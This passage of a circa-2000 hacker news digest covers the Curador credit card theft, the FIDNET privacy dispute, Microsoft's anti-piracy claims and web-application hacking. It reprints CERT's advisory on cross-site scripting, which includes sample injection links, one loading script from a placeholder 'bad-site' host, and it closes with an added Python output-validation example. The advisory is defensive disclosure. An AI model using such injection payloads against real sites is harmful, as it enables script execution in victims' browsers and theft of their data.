Schwartz said the CDT did not know which sites might be involved in providing personal information to DoubleClick to link online and offline data about their customers' behavior. But he said the group wants to harness the public to put pressure on all of DoubleClick's estimated 11,500 clients to protect customers' privacy.

"We want these companies to be aware that their customers are concerned about this issue," he said.
@HWA

88.0 HNN: Feb 2nd: More CC Numbers Found on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

Someone calling himself "Curador" posted over a thousand credit card numbers to a Xoom.com home page yesterday and claimed to have 4000 more. Xoom.com removed the page but it reappeared on Geocities a few hours later. The source of the numbers has not been revealed.

Internet News
http://www.internetnews.com/ec-news/article/0,1087,4_298021,00.html

Another Cracker Posts Stolen Cards Online
February 1, 2000
By Brian McWilliams
InternetNews.com Correspondent
E-Commerce News Archives

Another e-commerce site has been turned inside out by a cracker. Someone calling himself "Curador" claims to have stolen the entire sales database of an unidentified online site, including more than 5,000 credit card numbers. Around 1,000 of the stolen card numbers were posted by Curador late Monday night at a personal Website hosted by Xoom.com, the online homesteading site owned by NBC interactive (NBCI). After being notified about the Curador site, Xoom took it offline late Tuesday morning. The site, minus the credit card data, is mirrored here. Later Tuesday, Curador resurfaced at Geocities, where he posted what he claimed was the credit card number of Microsoft chairman Bill Gates. While the incident echoes the break-in and extortion attempt at CDuniverse.com earlier this month, Curador implied his motives were purely educational. "Maybe one day people will setup their sites properly before they start trading because otherwise this won't be the last page I post to the NET," wrote the cracker in a message at his site. No common shopping patterns were immediately apparent among the handful of shoppers contacted by InternetNews whose credit cards were stolen and posted at the Curador site. Leslie Lowdermilk, a research analyst in Texas, said she began shopping online this past holiday season, drawn by the convenience.
Noting that card holders are generally responsible for only the first $50 of fraudulent charges, Lowdermilk said the incident hasn't scared her off from making future online purchases. "When faced with either going to the mall at Christmas time or sitting in the comfort of my own home and shopping, I would much rather shop over the Internet than face the crowds. I think most places are reputable, and I've known lots of people who've done lots of shopping and never had a problem," she said. In the message at the Curador site, the cracker suggests that he exploited a weakness in Microsoft's (MSFT) SQL Server relational database. "Greetz to my friend Bill Gates, I think that any guy who sells Products Like SQL Server, with default world readable permissions can't be all BAD," wrote the cracker. According to Russ Cooper, operator of the NTbugtraq mailing list, SQL Server by default installs some files with world readable permission. But Cooper denied that Microsoft's product was inherently insecure. "Most commercial software packages install with loose or nonexistent permissions so that you can get them working easier and then lock it down. And most people don't," Cooper said. Notice of the break-in was sent to HackerNews.com early Tuesday morning. The message headers suggest it was sent using a dial-up account at Global Internet in the United Kingdom. According to Space Rogue, one of the operators of the HackerNews site and a security expert with consulting firm AtStake, the victimized site was apparently storing credit card numbers on its Web server, despite repeated warnings by security experts that the data should instead be transferred to a secure server not connected to the Internet. "You'd think it was common sense, but every other week we have another ecommerce site that's vulnerable and attacked, and I don't know how long it's going to take for people to learn," said Space Rogue.
@HWA

89.0 HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Apocalyse Dow

The recently proposed plan to safeguard critical systems against cyber attacks is alarming privacy advocates. Critics of the plan say that it relies too much on monitoring and surveillance and not enough on making systems more secure. The director of The Critical Infrastructure Assurance Office, John Tritak, has said that the plan is still in the planning stages and will evolve as time goes on.

InfoWorld
http://www.infoworld.com/articles/en/xml/00/02/01/000201enprivate.xml

WIRED
http://www.wired.com/news/politics/0,1283,34027,00.html

Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0131/web-privacy-02-02-00.asp

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2431233,00.html?chkpt=zdnntop

InfoWorld:

U.S. cyber-attack protection plan draws criticism
By Jennifer Jones

Privacy advocates Tuesday raised red flags before a U.S. Senate Judiciary Subcommittee looking into privacy implications of President Clinton's plan to safeguard critical systems against cyber attacks. Critics of the plan charged specifically that the Clinton Administration is relying "too heavily on monitoring and surveillance" instead of simply focusing on making systems more secure, according to Marc Rotenberg, executive director of the Electronic Privacy Information Center (EPIC). The Clinton Administration last month released its first "blueprint" for protecting critical government and private sector systems against hackers. Called the National Plan for Information Systems Protection, the plan eventually will loop in critical systems for communications, transportation, and financial services.
"There is disagreement as to whether an intrusive, government-directed initiative that views computer security as almost solely defending 'our cyberspace' from foreign assault is the right way to go," Rotenberg said in prepared testimony. EPIC officials especially took exception to the plan's inclusion of a Federal Intrusion Detection Network (FIDNET). Under the plan, a single government agency would be allowed to monitor communications across all federal networks. Rotenberg argued that FIDNET would require notification to all users of federal systems, including government employees and the public, or would break various privacy statutes including wiretapping guidelines. EPIC officials also said that the government's security policy overall has been inconsistent because it has prevented availability of some encryption and security tools. John Tritak, director of the President's Critical Infrastructure Assurance Office, however, countered that the plan, dubbed Version 1.0, is still in its preliminary stages. "The plan is designated Version 1.0 and subtitled 'An Invitation to a Dialog' to indicate that it is still a work in progress and that a broader range of perspectives must be taken into account if the plan is truly to be national in scope and treatment," Tritak said. Part of the unfolding plan calls for a partnership between Fortune 500 companies and all levels of government to work out details for safeguarding computers. The U.S. Chamber of Commerce this month will hold an initial meeting on private sector contributions to and participation in the plan. Privacy must play a key part in any efforts to hone details of the plan, Rotenberg warned. "I urge you to proceed very cautiously. The government is just now digging itself out of the many mistakes that were made over the past decade with computer security policy. This is not the best time to be pushing an outdated approach to network security," Rotenberg said. The U.S. 
Senate Judiciary Committee's Subcommittee on Technology, Terrorism, and Government Information, in Washington, is at www.senate.gov/~judiciary. The Electronic Privacy Information Center, in Washington, is at www.epic.org. The National Information Protection Center, in Washington, is at www.fbi.gov/nipc.

Jennifer Jones is an InfoWorld senior editor.

-=-

Wired;
http://www.wired.com/news/politics/0,1283,34027,00.html

Cyber Safe or Gov't Surveillance?
by Declan McCullagh
10:40 a.m. 1.Feb.2000 PST

WASHINGTON -- A government plan to monitor networks for intrusions goes too far and will lead to increased surveillance and privacy violations, a civil liberties group told a Senate panel on Tuesday. The Electronic Privacy Information Center said a memo it obtained last week shows that the Clinton administration's FIDNET proposal for "information systems protection" will result in unwarranted spying on Americans. Documents the group received through a Freedom of Information Act request indicate the administration is considering broad access to credit card and phone records of private citizens and monitoring of government workers' computers, EPIC director Marc Rotenberg told the Senate judiciary subcommittee on technology and terrorism. "The FIDNET proposal, as currently conceived, must simply be withdrawn. It is impermissible in the United States to give a federal agency such extensive surveillance authority," Rotenberg told the panel chaired by Jon Kyl, an Arizona Republican. The privacy problems of FIDNET and similar government efforts are exaggerated, said Critical Infrastructure Assurance Office director John Tritak. "FIDNET is intended to protect information on critical, civilian government computer systems, including that provided by private citizens. It will not monitor or be wired into private sector computers," Tritak said. "All aspects of the FIDNET will be fully consistent with all laws protecting the civil liberties and privacy rights of Americans."
Tritak showed up to discuss the so-called "National Plan for Information Systems Protection, Version 1.0," which the government released in January. It calls for additional government spending to thwart a "highly organized, systematic cyberattack by hostile powers or terrorist organizations." The 199-page plan includes a chapter titled "protecting privacy and civil liberties." The chapter calls for an annual "public-private colloquium" and review of privacy practices by "appropriate authorities." But it does not say the CIAO will reveal even summaries of its activities -- the sort of regular review required of federal prosecutors who ask for wiretaps of phone lines. "Nowhere does the Plan answer such questions as what formal reporting requirements will be established, what independent review will be conducted, and what mechanisms for public accountability and government oversight will be put in place," EPIC's Rotenberg said. Also testifying was Frank Cilluffo, deputy director of the organized crime project at the Center for Strategic & International Studies. CSIS has close ties to the military, and last month appointed soon-to-be former deputy secretary of defense John Hamre as its president and CEO. Cilluffo sided with CIAO: "Throughout history, the first obligation of the state has been to protect its citizens. Today is no exception." "Overall, I think the [CIAO] plan does an excellent job identifying gaps and shortfalls within the federal government, and charting an initial course of action to address them. My major concern is that it does not do enough," Cilluffo said. FIDNET, the part of the overall CIAO plan aimed at detecting intrusions into federal computers, came under fire last summer. Civil liberties groups and some legislators warned it could be too intrusive and could monitor the private-sector Internet. The Justice Department didn't help matters by replying last September in a letter that said FIDNET would not -- at least, as currently "envisioned."
During the hearing Tuesday, CIAO's Tritak echoed what other law enforcement representatives have said: "One person with a computer, a modem, and a telephone line anywhere in the world can potentially break into sensitive government files, shut down an airport's air traffic control system, or disrupt 911 services for an entire community." A top FBI official said the same thing in January, warning that electric power is vulnerable to miscreant hackers. But a person close to the North American Electric Reliability Council -- a trade association of electric power generating companies -- told Wired News that he wasn't aware of any power control computers hooked up to telephone lines or the Internet.

@HWA

90.0 HNN: Feb 2nd: AntiPiracy Campaign Increases Sales
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

Microsoft is claiming a sales increase in Estonia, Latvia and Lithuania is the result of a massive anti-piracy campaign there. Microsoft has reported that while piracy rates in these countries are still above 72% (they were as high as 92% in some of the countries) software sales have increased by as much as 500%. (Interesting how absolutely no other factors contributed to the increase in sales over the six month period, at least according to MS.)

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500162049-500204023-500922895-0,00.html

Microsoft pleased with anti-piracy campaign in Baltics

Copyright © 2000 Nando Media
Copyright © 2000 Agence France-Press

VILNIUS, Lithuania (February 1, 2000 11:59 a.m. EST http://www.nandotimes.com) - An anti-piracy software campaign recently launched in the Baltic states of Estonia, Latvia and Lithuania has significantly lifted Microsoft's sales in the region, a company official announced Tuesday.
"It was a tremendous success and we are starting to build our business in these countries," Bo Cruse, Microsoft managing director for the Baltic region said at a briefing in Vilnius. At the end of the six-month campaign, Microsoft's sales in January were up around 500 percent in Lithuania, and 300 percent in Estonia and Latvia. Software piracy remains common in the Baltic states. According to Microsoft's estimates the percentage of illegal software dipped only from 92 percent to 81 percent in Lithuania, from 90 percent to 85 percent in Latvia and from 86 percent to 72 percent in Estonia following the legalization campaign. The average for Europe is about 40 percent and for the Nordic countries about 35 percent, according to Norvald Heidel, Microsoft's anti-piracy manager for the Baltic and Nordic regions. Microsoft and the Business Software Alliance also worked with police and computer sellers to promote enforcement of software licenses. More than 30 court cases have been filed for copyright infringement following a crackdown on resellers and private users. A Lithuanian government official admitted that 40-60 percent of the government's software is illegal, and said that nearly $1 million would be needed to buy legal copies.

@HWA

91.0 HNN: Feb 2nd: Web Apps, the New Playground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by freqout

PC World sees things that make them fear putting their data online, when anyone with a little knowledge of how web applications work can gain access to others' data. Breaking Web applications has become the hack du jour over buffer overflows, fragmented packets, and default scripts/passwords. (This article specifically mentions Perfecto, which seems to like the fear-tactic way of selling its product: break into the site in front of the customer and then sell them your solution. Slimy.)
PC World
http://www1.pcworld.com/ontheweb/article/0,1978,14415,00.html

From PC World Online

The Web Is a Hacker's Playground
by Christina Wood

I don't scare easily. But I've been terrified twice in the past year. The first time it happened was while I watched The Blair Witch Project at a local theater. The second time was during a demonstration of a new software product. Now, I've seen a million software demos, and in the vast majority of these my biggest fear is that I'll fall asleep. This time, though, I found myself perched on the edge of my seat. Eran Reshef, cofounder and vice president of Perfecto Technologies, was showing me why he thinks the world needs his company's product, a security package (priced at upward of $50,000) that is designed to protect Web sites from hacker attacks. As I sat there watching, Reshef demonstrated how he could transform just about any Web site into his own personal playground. And though Reshef and most of his technical staff are former members of an elite technical unit in the Israeli Army, he denied that he possesses the hacking talents of a once-in-an-eon technical genius. In fact, Reshef was careful to characterize his skills as fairly common. He said that practically anyone who can put up a Web site--and has a burglar's moral code--can take a site down. Those same skills can be used (and this is when I really got frightened) to plunder a site for confidential information about its users. I don't want to alert any hackers out there to security holes that are waiting to be breached. So I won't mention the names of the Web sites I saw Reshef gain access to--but they're ones you know, maybe even ones you do business with. Reshef would spend 15 minutes or so editing HTML code and performing other technical tricks...and then I'd see the names and passwords of a site's programmers scroll across his computer screen.
He dropped items into his shopping cart at various e-commerce sites, including the online home of a major computer vendor, and then changed their prices at will. He also downloaded customer information from an airline's frequent-flyer site, and he described to me how he was able to make trades from the account of the CIO of a large online brokerage firm--while the CIO looked on. "This is bad," Reshef announced at one point in his demonstration for me. "The game is over--I can do anything I want [at this site] right now." Gulp. Protection Racket? Reshef didn't have to hack around firewalls or break encryption. He accomplished his break-ins using only his Web browser, some know-how, and maybe a little programming code. Reshef (and presumably hackers who use their abilities less benignly) hunts around Web pages for little programming mistakes. These subtle errors--Reshef says most programmers make them from time to time--offer knowledgeable snoops points of entry to a site's server. And once they have that access, they can cause all kinds of mayhem. Not that Reshef would--he's a nice guy. In fact, one analyst I spoke to described him as a Boy Scout. And the break-ins he performed were done only after obtaining the permission of the sites' proprietors. But in retrospect, I can't help imagining him appearing in an episode of the HBO series The Sopranos selling protection against the depredations of a frightening group of high-tech wise guys. Shortly after taking in Reshef's demonstration, I saw a report of a popular news site (which will also remain nameless) being taken completely down by an unknown hacker or hackers. I called the site manager to see whether the break-in involved the kind of hacking Reshef showed me. She said no. The site had simply had a problem with an FTP server, which was now fixed. Besides, she told me, the kind of thing I was describing to her was impossible. "Did you ever think maybe you were getting a snake-oil pitch?" she asked. 
"'Here's the disease, now here's the medicine you need to cure it?'" That's a reasonable question, I thought. So I did some checking. "The problem that Perfecto is targeting is right on the money," counters Mike Zboray, vice president and research director for the Gartner Group, an industry research firm. "Take a look at your typical Web server configured for use on the Net. The people who do that configuration are not terribly meticulous about the underlying code, and they aren't meticulous about how they have safeguarded the content they have created. When it works, they put it up. Is that good enough for e-commerce? Probably not." For quite a while, Zboray has been warning his clients to be diligent about protecting their Web sites from this kind of intrusion, either by plugging holes themselves or, more recently, by buying Perfecto's software. But to make his point, he has sometimes been forced to perform a little hacking of his own. "I'm not nearly as good at this as Reshef is, but I have been able to get complete access to servers. I do it just to demonstrate how people are exposed." A similar demonstration by Reshef persuaded Quote.com's Kaj Pedersen that his site needed Perfecto. "The selling point for me was when Reshef changed my password and was able to get my access privileges to the site," explains Pedersen, vice president of engineering at the financial market data site. Okay, I'm scared. And naturally, my first concern is for my own wallet. I practically live on the Internet. Are my life and finances an open book for every intelligent reprobate who has a browser? That depends. "If I were a vendor, I would be deathly afraid," says Zboray. "If I were a bank I would be deathly afraid. And anyone who is doing a company extranet should definitely worry if they have sensitive company data out there." On the other hand, Zboray believes, consumers shouldn't panic about the state of security on the Web. 
"I'm not afraid of using my credit card [at e-commerce sites]--the credit card companies are shielding me from responsibility for any fraudulent charges of more than $50." Much the same is true at online banks: A bank's FDIC insurance shields your account from loss if your bank--online or otherwise--is robbed. Watching Your Wallet Despite such reassurances, you still need to be careful where you take your business online. "Most sites that are doing e-commerce should have some kind of security statement with regard to how your transactions are secured," suggests Matthew Devost, senior analyst for Security Design International, a company that provides security consulting to large corporations and e-commerce companies. Look for that statement and read it carefully before you provide personal information to a site. If a site doesn't carry such a statement, and you're doing more than making a purchase there, call and grill a knowledgeable company representative on how safe the site is. Ask if the site uses an outside firm to test its security. Companies generally don't like to provide much detail--because they don't want to give away any secrets--but you need to make sure that they're taking measures to protect their site from intruders. "At the moment, only a small percentage of people call us to ask about security," says Quote.com's Pedersen. "It's mostly those who understand the technology and are concerned about how we will protect their personal data concerning their net worth. But I think these questions will become increasingly common as people begin to understand the vulnerabilities. I think people should be asking these questions." No Safety in Numbers Of course, the Web will never be entirely free of security threats. "There are a lot of smart people out there," says Devost. "And they will always find a way in if there is something they want." And unfortunately, there's no easy way to tell how safe a site is. 
That's partly because sites are reticent about divulging security information and partly because many sites are unaware of the risks. "I see a time where there might be a Good Housekeeping-style seal of approval for the security of sites," says Devost. "There are organizations that do that now for privacy. Why not for security?" Oh, and another thing. If you're a Web site manager, don't make the mistake of challenging a hacker. I told Eran Reshef about the news site's suggestion that Perfecto's business model was nothing more than a snake-oil pitch. Within 30 minutes, Reshef told me, Perfecto had gained access to the source code on the news site's server. He added, "That means I can do pretty much anything, including shut down the site." But since Reshef is a Boy Scout, the Web site in question managed to escape unscathed--this time. But if I had a Web-based business--or any plans to open one--I'd be thinking very seriously about hiring a bodyguard.

Christina Wood is a PC World contributing editor.

@HWA

92.0 HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Shill

Cross-site scripting has become such a major concern that it has finally prompted CERT to release a security advisory. The problem is that no one verifies input data on a web form or when dynamically generating pages. This allows someone to potentially insert damaging code that will be automatically run. No one has been victimized yet but the potential risk is huge, affecting every browser and web page. To protect yourself from this risk CERT recommends that you turn off cookies, all Java and "Not Engage in Promiscuous Browsing".
CERT
http://www.cert.org/advisories/CA-2000-02.html

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/165817l.htm

CERT:

CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests

This advisory is being published jointly by the CERT Coordination Center, DoD-CERT, the DoD Joint Task Force for Computer Network Defense (JTF-CND), the Federal Computer Incident Response Capability (FedCIRC), and the National Infrastructure Protection Center (NIPC).

Original release date: February 2, 2000
Last revised: February 3, 2000
A complete revision history is at the end of this file.

Systems Affected

    Web browsers
    Web servers that dynamically generate pages based on unvalidated input

Overview

A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user.

I. Description

Background

Most web browsers have the capability to interpret scripts embedded in web pages downloaded from a web server. Such scripts may be written in a variety of scripting languages and are run by the client's browser. Most browsers are installed with the capability to run scripts enabled by default.

Malicious code provided by one client for another client

Sites that host discussion groups with web interfaces have long guarded against a vulnerability where one client embeds malicious HTML tags in a message intended for another client. For example, an attacker might post a message like

    Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
    This is the end of my message.

When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>.

When client-to-client communications are mediated by a server, site developers explicitly recognize that data input is untrustworthy when it is presented to other users. Most discussion group servers either will not accept such input or will encode/filter it before sending anything to other readers.

Malicious code sent inadvertently by a client for itself

Many Internet web sites overlook the possibility that a client may send malicious data intended to be used only by itself. This is an easy mistake to make. After all, why would a user enter malicious code that only the user will see? However, this situation may occur when the client relies on an untrustworthy source of information when submitting a request. For example, an attacker may construct a malicious link such as

    <A HREF="http://example.com/comment.cgi?
    mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>

When an unsuspecting user clicks on this link, the URL sent to example.com includes the malicious code. If the web server sends a page back to the user including the value of mycomment, the malicious code may be executed unexpectedly on the client. This example also applies to untrusted links followed in email or newsgroup messages.

Abuse of other tags

In addition to scripting tags, other HTML tags such as the <FORM> tag have the potential to be abused by an attacker. For example, by embedding malicious <FORM> tags at the right place, an intruder can trick users into revealing sensitive information by modifying the behavior of an existing form. Other HTML tags can also be abused to alter the appearance of the page, insert unwanted or offensive images or sounds, or otherwise interfere with the intended appearance and behavior of the page.
Abuse of trust

At the heart of this vulnerability is the violation of trust that results from the "injected" script or HTML running within the security context established for the example.com site. It is, presumably, a site the browser victim is interested in enough to visit and interact with in a trusted fashion. In addition, the security policy of the legitimate server site example.com may also be compromised. This example explicitly shows the involvement of two sites:

    <A HREF="http://example.com/comment.cgi?
    mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>

Note the SRC attribute in the <SCRIPT> tag is explicitly incorporating code from a presumably unauthorized source (bad-site). Both of the previous examples show violations of the same-source origination policy fundamental to most scripting security models:

    Netscape Communicator Same Origin Policy
    Microsoft Scriptlet Security

Because one source is injecting code into pages sent by another source, this vulnerability has also been described as "cross-site" scripting. At the time of publication, malicious exploitation of this vulnerability has not been reported to the CERT/CC. However, because of the potential for such exploitation, we recommend that organization CIOs, managers, and system administrators aggressively implement the steps listed in the solution section of this document. Technical feedback to appropriate technical, operational, and law enforcement authorities is encouraged.

II. Impact

Users may unintentionally execute scripts written by an attacker when they follow untrusted links in web pages, mail messages, or newsgroup postings. Users may also unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by other users.
Because the malicious scripts are executed in a context that appears to have originated from the targeted site, the attacker has full access to the document retrieved (depending on the technology chosen by the attacker), and may send data contained in the page back to their site. For example, a malicious script can read fields in a form provided by the real server, then send this data to the attacker. Note that the access that an intruder has to the Document Object Model (DOM) is dependent on the security architecture of the language chosen by the attacker. Specifically, Java applets do not provide the attacker with any access to the DOM. Alternatively, the attacker may be able to embed script code that has additional interactions with the legitimate web server without alerting the victim. For example, the attacker could develop an exploit that posted data to a different page on the legitimate web server. Also, even if the victim's web browser does not support scripting, an attacker can alter the appearance of a page, modify its behavior, or otherwise interfere with normal operation. The specific impact can vary greatly depending on the language selected by the attacker and the configuration of any authentic pages involved in the attack. Some examples that may not be immediately obvious are included here.

SSL-Encrypted Connections May Be Exposed

The malicious script tags are introduced before the Secure Socket Layer (SSL) encrypted connection is established between the client and the legitimate server. SSL encrypts data sent over this connection, including the malicious code, which is passed in both directions. While ensuring that the client and server are communicating without snooping, SSL makes no attempt to validate the legitimacy of data transmitted. Because there really is a legitimate dialog between the client and the server, SSL reports no problems.
Malicious code that attempts to connect to a non-SSL URL may generate warning messages about the insecure connection, but the attacker can circumvent this warning simply by running an SSL-capable web server.

Attacks May Be Persistent Through Poisoned Cookies

Once malicious code is executing that appears to have come from the authentic web site, cookies may be modified to make the attack persistent. Specifically, if the vulnerable web site uses a field from the cookie in the dynamic generation of pages, the cookie may be modified by the attacker to include malicious code. Future visits to the affected web site (even from trusted links) will be compromised when the site requests the cookie and displays a page based on the field containing the code.

Attacker May Access Restricted Web Sites from the Client

By constructing a malicious URL an attacker may be able to execute script code on the client machine that exposes data from a vulnerable server inside the client's intranet. The attacker may gain unauthorized web access to an intranet web server if the compromised client has cached authentication for the targeted server. There is no requirement for the attacker to masquerade as any particular system. An attacker only needs to identify a vulnerable intranet server and convince the user to visit an innocent looking page to expose potentially sensitive data on the intranet server.

Domain Based Security Policies May Be Violated

If your browser is configured to allow execution of scripting languages from some hosts or domains while preventing this access from others, attackers may be able to violate this policy. By embedding malicious script tags in a request sent to a server that is allowed to execute scripts, an attacker may gain this privilege as well. For example, Internet Explorer security "zones" can be subverted by this technique.
Use of Less-Common Character Sets May Present Additional Risk

Browsers interpret the information they receive according to the character set chosen by the user if no character set is specified in the page returned by the web server. However, many web sites fail to explicitly specify the character set (even if they encode or filter characters with special meaning in the ISO-8859-1), leaving users of alternate character sets at risk.

Attacker May Alter the Behavior of Forms

Under some conditions, an attacker may be able to modify the behavior of forms, including how results are submitted.

III. Solution

Solutions for Users

None of the solutions that web users can take are complete solutions. In the end, it is up to web page developers to modify their pages to eliminate these types of problems. However, web users have two basic options to reduce their risk of being attacked through this vulnerability.

The first, disabling scripting languages in their browser, provides the most protection but has the side effect for many users of disabling functionality that is important to them. Users should select this option when they require the lowest possible level of risk.

The second solution, being selective about how they initially visit a web site, will significantly reduce a user's exposure while still maintaining functionality. Users should understand that they are accepting more risk when they select this option, but are doing so in order to preserve functionality that is important to them.

Unfortunately, it is not possible to quantify the risk difference between these two options. Users who decide to continue operating their browsers with scripting languages enabled should periodically revisit the CERT/CC web site for updates, as well as review other sources of security information to learn of any increases in threat or risk related to this vulnerability.
Web Users Should Disable Scripting Languages in Their Browsers

Exploiting this vulnerability to execute code requires that some form of embedded scripting language be enabled in the victim's browser. The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Note that attackers may still be able to influence the appearance of content provided by the legitimate site by embedding other HTML tags in the URL. Malicious use of the <FORM> tag in particular is not prevented by disabling scripting languages.

Detailed instructions to disable scripting languages in your browser are available from our Malicious Code FAQ:

  http://www.cert.org/tech_tips/malicious_code_FAQ.html

Web Users Should Not Engage in Promiscuous Browsing

Some users are unable or unwilling to disable scripting languages completely. While disabling these scripting capabilities is the most effective solution, there are some techniques that can be used to reduce a user's exposure to this vulnerability.

Since the most significant variations of this vulnerability involve cross-site scripting (the insertion of tags into another site's web page), users can gain some protection by being selective about how they initially visit a web site. Typing addresses directly into the browser (or using securely stored local bookmarks) is likely to be the safest way of connecting to a site.

Users should be aware that even links to unimportant sites may expose other local systems on the network if the client's system resides behind a firewall, or if the client has cached credentials to access other web servers (e.g., for an intranet). For this reason, cautious web browsing is not a comparable substitute for disabling scripting.

With scripting enabled, visual inspection of links does not protect users from following malicious links, since the attacker's web site may use a script to misrepresent the links in the user's window.
For example, the contents of the Goto and Status bars in Netscape are controllable by JavaScript.

Solutions for Web Page Developers and Web Site Administrators

Web Page Developers Should Recode Dynamically Generated Pages to Validate Output

Web site administrators and developers can prevent their sites from being abused in conjunction with this vulnerability by ensuring that dynamically generated pages do not contain undesired tags.

Attempting to remove dangerous meta-characters from the input stream leaves a number of risks unaddressed. We encourage developers to restrict variables used in the construction of pages to those characters that are explicitly allowed and to check those variables during the generation of the output page. In addition, web pages should explicitly set a character set to an appropriate value in all dynamically generated pages.

Because encoding and filtering data is such an important step in responding to this vulnerability, and because it is a complicated issue, the CERT/CC has written a document which explores this issue in more detail:

  http://www.cert.org/tech_tips/malicious_code_mitigation.html

Web Server Administrators Should Apply a Patch From Their Vendor

Some web server products include dynamically generated pages in the default installation. Even if your site does not include dynamic pages developed locally, your web server may still be vulnerable. For example, your server may include malicious tags in the "404 Not Found" page generated by your web server. Web server administrators are encouraged to apply patches as suggested by your vendor to address this problem.

Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive more information. If you do not see your vendor's name, the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Appendix A. Vendor Information

Apache

More information from apache can be found at

  http://www.apache.org/info/css-security

iPlanet - A Sun-Netscape Alliance

Additional information from iPlanet can be found at:

  http://developer.iplanet.com/docs/technote/security/cert_ca2000_02.html

Microsoft

Microsoft is providing information and assistance on this issue for its customers. This information will be posted at www.microsoft.com/security/.

Sun Microsystems, Inc.

Please see recommendations for Java Web Server at:

  http://sun.com/software/jwebserver/faq/jwsca-2000-02.html

Sun is also providing information on security issues in general. This information is posted at

  http://java.sun.com/security

A good introduction is in

  http://java.sun.com/sfaq

While any web-based object, including Java Applets, can be unintentionally loaded through the mechanisms described in this advisory, once they are loaded the Java security mechanisms prevent any harmful information from being disclosed or client information from being damaged.

Our thanks to Marc Slemko, Apache Software Foundation member; Iris Associates; iPlanet; the Microsoft Security Response Center, the Microsoft Internet Explorer Security Team, and Microsoft Research.

This document is available from:

  http://www.cert.org/advisories/CA-2000-02.html

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
  CERT® Coordination Center
  Software Engineering Institute
  Carnegie Mellon University
  Pittsburgh PA 15213-3890
  U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

  http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.
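The developer guidance in the Solution section above (restrict the variable to explicitly allowed characters, check it while generating the output page, and set the character set explicitly) worked through in Python as an added example; this is not code from the CERT advisory or from any vendor. The comment.cgi script and its mycomment parameter come from the advisory's own example link; the allow-list, the page template and the ISO-8859-1 default are assumptions made for the example.

```python
"""Output validation for a dynamically generated page.

Added example (not code from the CERT advisory): the advisory's
proof-of-concept link points at a comment.cgi that echoes its
'mycomment' parameter into the returned page. render_unsafe() reproduces
that defect; render_safe() applies the advisory's recommendations:
restrict the variable to explicitly allowed characters, encode whatever
is emitted, and state the character set explicitly.
"""
import html
import re
from urllib.parse import parse_qs

# The advisory's example link; "bad-site" is the advisory's own placeholder.
ADVISORY_LINK = ("http://example.com/comment.cgi?"
                 "mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>")

# Allow-list for a free-text comment (an assumption for this example;
# a real site picks the set its content actually needs). Note that the
# HTML meta-characters < > & " are simply not in it.
ALLOWED = re.compile(r"^[A-Za-z0-9 .,!?'()-]*$")


def comment_from_url(url):
    """Return the mycomment value exactly as the CGI would receive it."""
    query = url.split("?", 1)[1] if "?" in url else ""
    return parse_qs(query, keep_blank_values=True).get("mycomment", [""])[0]


def render_unsafe(comment):
    """Vulnerable pattern: the parameter is pasted into the page verbatim
    and no character set is declared."""
    return ("Content-Type: text/html\r\n\r\n"
            "<HTML><BODY>Your comment: " + comment + "</BODY></HTML>")


def render_safe(comment, charset="ISO-8859-1"):
    """Hardened pattern: reject anything outside the allow-list, HTML-encode
    whatever is emitted anyway (defence in depth), and declare the character
    set both in the HTTP header and in the document itself."""
    if ALLOWED.match(comment):
        body = "Your comment: " + html.escape(comment, quote=True)
    else:
        body = ("Your comment was rejected: it contains characters "
                "that are not permitted.")
    return (f"Content-Type: text/html; charset={charset}\r\n\r\n"
            f'<HTML><HEAD><META HTTP-EQUIV="Content-Type" '
            f'CONTENT="text/html; charset={charset}"></HEAD>'
            f"<BODY>{body}</BODY></HTML>")


def body_of(response):
    """Split an HTTP response into its entity body (after the blank line)."""
    return response.split("\r\n\r\n", 1)[1]


def has_script_tag(response):
    """Check an emitted page for a <SCRIPT ...> tag the site author never wrote."""
    return re.search(r"<script\b", body_of(response), re.IGNORECASE) is not None


if __name__ == "__main__":
    injected = comment_from_url(ADVISORY_LINK)
    print("unsafe page carries injected script:", has_script_tag(render_unsafe(injected)))
    print("safe page carries injected script:  ", has_script_tag(render_safe(injected)))
    print(render_safe("Nice site, isn't it?"))
```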
Getting security information

